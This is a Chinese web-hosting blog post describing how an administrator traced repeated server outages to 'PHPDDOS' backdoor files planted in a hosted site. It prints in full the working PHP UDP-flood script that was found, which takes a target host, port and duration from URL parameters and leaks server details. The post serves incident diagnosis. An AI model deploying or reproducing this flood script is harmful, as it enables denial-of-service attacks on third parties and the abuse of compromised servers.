西部数码主机 | 阿里云主机| 虚拟主机 | 服务器 | 返回乐道官网
当前位置: 主页 > php教程 > 其他 >

被phpddos服务器宕机,如何防御?

时间:2012-01-27 19:23来源:未知 作者:好模板 点击:
好模板一客户机器从春节到今天断断续续宕机,服务器未中任何木马,也未找到任何后门,好模板按照排查方法: 1. 宕机时,服务器未死机,只是无法远程连接,带宽耗尽 2. 宕机时间

 好模板一客户机器从春节到今天断断续续宕机,服务器未中任何木马,也未找到任何后门,好模板按照排查方法:

1. 宕机时,服务器未死机,只是无法远程连接,带宽耗尽

2. 宕机时间几十分钟,最长半小时,服务器自动回收资源,服务器又正常

3.直接停止IIS,服务器一切正常。

这明显是有网站脚本出现问题,最可能是最近流行的PHPDDOS.如何找到哪个站点脚本有问题呢?

先把所有网站全部停止,然后一个一个开启,开启时候一个一个看网站目录文件,找最近修改过的文件与文件夹看代码。

好模板大概看了一百多个网站之后,终于看到一个网站的子文件夹下有几个2012年新建的文件,全部是shell后门。

当中看到一条代码如下:

 

  1. <?php 
  2. set_time_limit(999999); 
  3. $host = $_GET['host']; 
  4. $port = $_GET['port']; 
  5. $exec_time = $_GET['time']; 
  6. $Sendlen = 65535
  7. $packets = 0
  8. ignore_user_abort(True); 
  9.  
  10. if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0){ 
  11.         if (StrLen($_GET['rat'])<>0){ 
  12.                 echo $_GET['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_GET['rat']; 
  13.                 exit; 
  14.             } 
  15.         echo "Warning to: opening"; 
  16.         exit; 
  17.     } 
  18.  
  19. for($i=0;$i<$Sendlen;$i++){ 
  20.         $out ."A"
  21.     } 
  22.  
  23. $max_time = time()+$exec_time; 
  24. //提示: www.haoddos.com 是骗子 请谨慎。 
  25. while(1){ 
  26.     $packets++; 
  27.     if(time() > $max_time){ 
  28.         break; 
  29.     } 
  30.     $fp = fsockopen("udp://$host", $port, $errno, $errstr, 5); 
  31.         if($fp){ 
  32.             fwrite($fp, $out); 
  33.             fclose($fp); 
  34.     } 
  35.  
  36. echo "Send Host:$host:$port<br><br>"; 
  37. echo "Send Flow:$packets * ($Sendlen/1024=" . round($Sendlen/1024, 2) . ")kb / 1024 = " . round($packets*$Sendlen/1024/1024, 2) . " mb<br><br>"; 
  38. echo "Send Rate:" . round($packets/$exec_time, 2) . " packs/s;" . round($packets/$exec_time*$Sendlen/1024/1024, 2) . " mb/s"; 
  39. ?>  

(责任编辑:好模板)

顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------